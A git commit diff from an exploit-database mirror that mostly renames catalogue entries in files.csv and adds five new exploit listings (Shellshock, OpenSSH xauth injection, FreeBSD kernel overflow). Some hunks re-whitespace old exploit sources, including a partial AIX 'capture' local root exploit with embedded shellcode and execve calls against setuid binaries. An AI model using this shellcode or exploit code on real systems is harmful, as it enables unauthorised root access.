DB: 2016-03-17
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
This commit is contained in:
parent
48534c54b0
commit
477bcbdcc0
7877 changed files with 590387 additions and 589604 deletions
39
files.csv
39
files.csv
|
@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port
|
|||
3668,platforms/php/webapps/3668.txt,"CodeWand phpBrowse (site_path) Remote File Inclusion Vulnerability",2007-04-05,kezzap66345,php,webapps,0
|
||||
3669,platforms/php/webapps/3669.txt,"PHP-Generics 1.0.0 beta - Multiple Remote File Inclusion Vulnerabilities",2007-04-05,bd0rk,php,webapps,0
|
||||
3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
|
||||
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0
|
||||
3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities",2007-04-05,BlackHawk,php,webapps,0
|
||||
3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0
|
||||
3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0
|
||||
3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0
|
||||
|
@ -10002,7 +10002,7 @@ id,file,description,date,author,platform,type,port
|
|||
10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia Cross-Site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0
|
||||
10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0
|
||||
10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80
|
||||
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80
|
||||
10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS - Multiple Vulnerabilities",2009-12-30,emgent,hardware,webapps,80
|
||||
10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0
|
||||
10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
|
||||
10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0
|
||||
|
@ -10487,7 +10487,7 @@ id,file,description,date,author,platform,type,port
|
|||
11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection Vulnerability",2010-02-14,snakespc,php,webapps,0
|
||||
11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3",2010-02-14,ROOT_EGY,php,webapps,0
|
||||
11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - (.mp3) Local Denial of Service (DoS) (2)",2010-02-14,Mr.tro0oqy,windows,dos,0
|
||||
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL",2010-02-14,kaMtiEz,php,webapps,0
|
||||
11452,platforms/php/webapps/11452.txt,"Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities",2010-02-14,kaMtiEz,php,webapps,0
|
||||
11453,platforms/windows/remote/11453.py,"Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe",2010-02-15,"Nullthreat and Pure|Hate",windows,remote,0
|
||||
11455,platforms/php/webapps/11455.txt,"Généré par KDPics 1.18 - Remote Add Admin",2010-02-15,snakespc,php,webapps,0
|
||||
11456,platforms/php/webapps/11456.txt,"superengine CMS (Custom Pack) SQL Injection Vulnerability",2010-02-15,10n1z3d,php,webapps,0
|
||||
|
@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port
|
|||
11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0
|
||||
11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0
|
||||
11893,platforms/linux/dos/11893.pl,"tPop3d 1.5.3 DoS",2010-03-26,OrderZero,linux,dos,0
|
||||
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability",2010-03-26,eidelweiss,php,webapps,0
|
||||
11894,platforms/php/webapps/11894.txt,"cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities",2010-03-26,eidelweiss,php,webapps,0
|
||||
11895,platforms/php/webapps/11895.txt,"CyberCMS - Remote SQL Injection",2010-03-26,hc0de,php,webapps,0
|
||||
11896,platforms/php/webapps/11896.txt,"BPTutors Tutoring site script - CSRF Create Administrator Account",2010-03-26,bi0,php,webapps,0
|
||||
11897,platforms/php/webapps/11897.php,"Kasseler CMS 1.4.x lite (Module Jokes) SQL-Injection Exploit",2010-03-26,Sc0rpi0n,php,webapps,0
|
||||
|
@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port
|
|||
12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0
|
||||
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)",2010-04-02,eidelweiss,php,webapps,0
|
||||
12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0
|
||||
12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0
|
||||
12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
|
||||
12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
|
||||
|
@ -11182,7 +11182,7 @@ id,file,description,date,author,platform,type,port
|
|||
12239,platforms/php/webapps/12239.txt,"Joomla Component BeeHeard Lite com_beeheard Local File Inclusion Vulnerability",2010-04-14,AntiSecurity,php,webapps,0
|
||||
12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC",2010-04-14,mr_me,windows,dos,0
|
||||
15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0
|
||||
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0
|
||||
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
|
||||
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0
|
||||
12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0
|
||||
12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0
|
||||
|
@ -11233,7 +11233,7 @@ id,file,description,date,author,platform,type,port
|
|||
12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0
|
||||
12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
|
||||
12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
|
||||
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0
|
||||
12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
|
||||
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0
|
||||
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0
|
||||
12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0
|
||||
|
@ -11377,7 +11377,7 @@ id,file,description,date,author,platform,type,port
|
|||
12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0
|
||||
12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
|
||||
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0
|
||||
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
|
||||
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
|
||||
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
|
||||
12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0
|
||||
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0
|
||||
|
@ -11587,7 +11587,7 @@ id,file,description,date,author,platform,type,port
|
|||
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
|
||||
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0
|
||||
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
|
||||
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
|
||||
12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0
|
||||
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
|
||||
|
@ -11626,7 +11626,7 @@ id,file,description,date,author,platform,type,port
|
|||
12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0
|
||||
12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0
|
||||
12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0
|
||||
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability",2010-05-24,eidelweiss,php,webapps,0
|
||||
12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0
|
||||
12734,platforms/asp/webapps/12734.txt,"Blaze Apps Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0
|
||||
12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0
|
||||
12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0
|
||||
|
@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port
|
|||
14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0
|
||||
14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
|
||||
14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0
|
||||
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0
|
||||
14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps,0
|
||||
14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0
|
||||
14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0
|
||||
14289,platforms/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery [CSRF]",2010-07-09,saudi0hacker,php,webapps,0
|
||||
|
@ -12587,7 +12587,7 @@ id,file,description,date,author,platform,type,port
|
|||
14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0
|
||||
14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0
|
||||
14324,platforms/php/webapps/14324.txt,"Sillaj time tracking tool Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
14325,platforms/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
|
||||
14326,platforms/php/webapps/14326.txt,"My Kazaam Address & Contact Organizer SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0
|
||||
14327,platforms/php/webapps/14327.txt,"Joomla Rapid Recipe Persistent XSS Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
|
||||
14328,platforms/php/webapps/14328.html,"Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-11,10n1z3d,php,webapps,0
|
||||
|
@ -15550,7 +15550,7 @@ id,file,description,date,author,platform,type,port
|
|||
17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin <= 1.0.31 - SQL Injection Vulnerability",2011-09-27,"Miroslav Stampar",php,webapps,0
|
||||
17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0
|
||||
17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0
|
||||
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0
|
||||
17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0
|
||||
17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0
|
||||
17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0
|
||||
17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0
|
||||
|
@ -21692,7 +21692,7 @@ id,file,description,date,author,platform,type,port
|
|||
24516,platforms/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone (showcategory.php cid param) - SQL Injection Vulnerability",2013-02-18,"Easy Laster",php,webapps,0
|
||||
24517,platforms/hardware/webapps/24517.txt,"USB Sharp 1.3.4 iPad iPhone - Multiple Vulnerabilities",2013-02-18,Vulnerability-Lab,hardware,webapps,0
|
||||
24522,platforms/php/webapps/24522.txt,"RTTucson Quotations Database - Multiple Vulnerabilities",2013-02-20,3spi0n,php,webapps,0
|
||||
24531,platforms/php/webapps/24531.txt,"Web Cookbook Multiple Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0
|
||||
24531,platforms/php/webapps/24531.txt,"Web Cookbook - Multiple Vulnerabilities",2013-02-21,"cr4wl3r ",php,webapps,0
|
||||
24526,platforms/windows/remote/24526.py,"Microsoft Office 2010 Download Execute",2013-02-20,g11tch,windows,remote,0
|
||||
24527,platforms/windows/remote/24527.rb,"BigAnt Server 2.97 - SCH And DUPF Buffer Overflow",2013-02-20,metasploit,windows,remote,0
|
||||
24528,platforms/windows/remote/24528.rb,"BigAnt Server 2.97 - DUPF Command Arbitrary File Upload",2013-02-20,metasploit,windows,remote,0
|
||||
|
@ -27176,7 +27176,7 @@ id,file,description,date,author,platform,type,port
|
|||
30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
|
||||
30233,platforms/windows/dos/30233.pl,"LiteWEB Web Server 2.7 Invalid Page Remote Denial of Service Vulnerability",2007-06-25,Prili,windows,dos,0
|
||||
30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injection Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0
|
||||
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerability",2013-12-12,"cr4wl3r ",php,webapps,0
|
||||
30235,platforms/php/webapps/30235.txt,"KikChat - (LFI/RCE) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0
|
||||
30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0
|
||||
30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection Vulnerability",2013-12-12,GalaxyAndroid,php,webapps,0
|
||||
30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0
|
||||
|
@ -31173,7 +31173,7 @@ id,file,description,date,author,platform,type,port
|
|||
34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
|
||||
34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
|
||||
34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 - 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
|
||||
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
|
||||
34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
|
||||
34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
|
||||
34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
|
||||
34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
|
||||
|
@ -31894,7 +31894,7 @@ id,file,description,date,author,platform,type,port
|
|||
35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0
|
||||
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
|
||||
35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
|
||||
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
|
||||
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - (.dps) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
|
||||
|
@ -35798,3 +35798,8 @@ id,file,description,date,author,platform,type,port
|
|||
39560,platforms/windows/dos/39560.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
|
||||
39561,platforms/windows/dos/39561.txt,"Windows Kernel ATMFD.DLL OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
|
||||
39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
|
||||
39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443
|
||||
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
|
||||
39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443
|
||||
39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22
|
||||
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -94,6 +94,6 @@ int main()
|
|||
execve( "/usr/bin/netpmon", args, envs );
|
||||
|
||||
return( 0 );
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-06-14]
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-06-14]
|
||||
|
|
|
@ -95,6 +95,6 @@ int main()
|
|||
execve( "/usr/sbin/ipl_varyon", args, envs );
|
||||
|
||||
return( 0 );
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-06-14]
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-06-14]
|
||||
|
|
|
@ -94,6 +94,6 @@ int main()
|
|||
execve( "/usr/bin/paginit", args, envs );
|
||||
|
||||
return( 0 );
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-06-14]
|
||||
}
|
||||
|
||||
// milw0rm.com [2005-06-14]
|
||||
|
|
|
@ -155,6 +155,6 @@ L=`expr $L + 144`
|
|||
./a.out $L
|
||||
done
|
||||
/str0ke
|
||||
*/
|
||||
|
||||
// milw0rm.com [1997-05-27]
|
||||
*/
|
||||
|
||||
// milw0rm.com [1997-05-27]
|
||||
|
|
|
@ -156,6 +156,6 @@ do
|
|||
echo $L
|
||||
L=`expr $L + 42`
|
||||
./a.out $L
|
||||
done */
|
||||
|
||||
// milw0rm.com [1997-05-26]
|
||||
done */
|
||||
|
||||
// milw0rm.com [1997-05-26]
|
||||
|
|
|
@ -1,178 +1,178 @@
|
|||
/* 07/2007: public release
|
||||
* IBM AIX <= 5.3 sp6
|
||||
*
|
||||
* AIX capture Local Root Exploit
|
||||
* By qaaz
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/select.h>
|
||||
|
||||
#define TARGET "/usr/bin/capture"
|
||||
#define VALCNT 40
|
||||
|
||||
#define MAX(x,y) ((x) > (y) ? (x) : (y))
|
||||
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
|
||||
|
||||
unsigned char qaazcode[] =
|
||||
"\x60\x60\x60\x60\x60\x60\x60\x60"
|
||||
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
|
||||
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
|
||||
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
|
||||
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
|
||||
"\x44\xff\xff\x02\x38\x75\xff\x5f"
|
||||
"\x38\x63\x01\x01\x88\x95\xff\x5d"
|
||||
"\x38\x63\x01\x02\x38\x63\xfe\xff"
|
||||
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
|
||||
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
|
||||
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
|
||||
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
|
||||
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
|
||||
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
|
||||
|
||||
void shell(int p1[2], int p2[2])
|
||||
{
|
||||
ssize_t n;
|
||||
fd_set rset;
|
||||
char buf[4096];
|
||||
|
||||
for (;;) {
|
||||
FD_ZERO(&rset);
|
||||
FD_SET(p1[0], &rset);
|
